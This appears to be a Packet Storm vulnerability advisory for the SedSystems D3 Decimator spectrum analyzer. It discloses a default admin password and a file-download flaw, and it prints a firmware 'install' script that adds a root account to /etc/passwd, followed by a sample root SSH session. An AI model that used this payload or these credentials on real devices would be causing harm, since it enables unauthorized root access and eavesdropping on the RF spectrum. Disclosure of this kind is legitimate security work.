exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

SedSystems D3 Decimator Default Credentials / File Disclosure

SedSystems D3 Decimator Default Credentials / File Disclosure
Posted Apr 14, 2017
Authored by prdelka

SedSystems D3 Decimator suffers from default credential and local file disclosure vulnerabilities.

tags | exploit, local, vulnerability, info disclosure
SHA-256 | 30e71a2e924700d68946538cff7d0f87bb02615b8297043b63f0dbb2275f4336

SedSystems D3 Decimator Default Credentials / File Disclosure

Change Mirror Download
SedSystems D3 Decimator Multiple Vulnerabilities
Identification of the vulnerable device can be performed by scanning for
TCP port 9784 which offers a default remote API. When connected to this
device it will announce itself with "connected" or similar:

Connected to x.x.x.x.
Escape character is '^]'.

The web service by default has a user interface for accessing the RF
spectrum analyzer capability. The device itself from the API can give
raw remote access to I/Q samples so can be used to remotely sniff the
RF spectrum. The Web Configuration Manager can be found on
"/cgi-bin/wcm.cgi". Multiple vulnerabilities exist.

Hardcoded credentials can be found in the /etc/passwd files contained
within the default firmware since at least February 2013. The following
entries can be found:


The admin user has a default password of "admin", at this time the root
user password is unknown however there is no documented way of changing
this trivially in a device. Using the "admin" user you can obtain a web
session to the wcm.cgi and exploit a hidden arbitary file download
vulnerability discovered by reverse engineering the firmware:


This will allow you to download any file and as the "admin" user has root
privileges you can obtain access to any file on the device. To execute
arbitary code you can make use of a vulnerbaility within the firmware
flash routines. By uploading a crafted tarball that contains a "install"
script in its root, the device will accept your firmware and then attempt
to execute ./install if found as root, you can then cancel the "flash"
process to prevent bricking/modifcation of the device. The problem is due
to /usr/bin/install_flash which after using "tar" to unpack an archive
to a tmp folder of /tmp/PID_of_tar does the following:

80 # If the archive contained its own install script then use that
82 if [ -x ./install ]; then
83 ./install $all_args
84 rc=$?
85 exit $rc
86 fi

Using this vulnerability you can upload a .tar file containing an install
file that looks like the following to obtain a root user account with

cat install
echo adm1n:\$1\$\$CoERg7ynjYLsj2j4glJ34.:0:0:root:/:/bin/sh >> /etc/passwd

You can then SSH remotely to the device as PermitRootLogin is enabled
by default.


$ ssh -l adm1n x.x.x.x
adm1n@x.x.x.x's password: admin
# uname -a
Linux d3-decimator-540 #1 PREEMPT Wed Aug 8 10:04:25 CST 2012 armv5tejl GNU/Linux
# cat /proc/cpuinfo
Processor : ARM926EJ-S rev 4 (v5l)
BogoMIPS : 103.83
Features : swp half thumb fastmult vfp edsp java
CPU implementer : 0x41
CPU architecture: 5TEJ
CPU variant : 0x0
CPU part : 0x926
CPU revision : 4

Hardware : SED 32XX Based CCA
Revision : 0000
Serial : 0000000000000000

Vendor website can be found at the following url:
* http://www.sedsystems.ca/decimator_spectrum_analyzer

-- prdelka

Login or Register to add favorites

File Archive:

September 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    2 Files
  • 2
    Sep 2nd
    21 Files
  • 3
    Sep 3rd
    0 Files
  • 4
    Sep 4th
    17 Files
  • 5
    Sep 5th
    34 Files
  • 6
    Sep 6th
    29 Files
  • 7
    Sep 7th
    11 Files
  • 8
    Sep 8th
    25 Files
  • 9
    Sep 9th
    0 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    26 Files
  • 12
    Sep 12th
    23 Files
  • 13
    Sep 13th
    17 Files
  • 14
    Sep 14th
    22 Files
  • 15
    Sep 15th
    16 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    19 Files
  • 19
    Sep 19th
    60 Files
  • 20
    Sep 20th
    23 Files
  • 21
    Sep 21st
    15 Files
  • 22
    Sep 22nd
    8 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    17 Files
  • 26
    Sep 26th
    3 Files
  • 27
    Sep 27th
    13 Files
  • 28
    Sep 28th
    5 Files
  • 29
    Sep 29th
    12 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags


packet storm

© 2022 Packet Storm. All rights reserved.

Security Services
Hosting By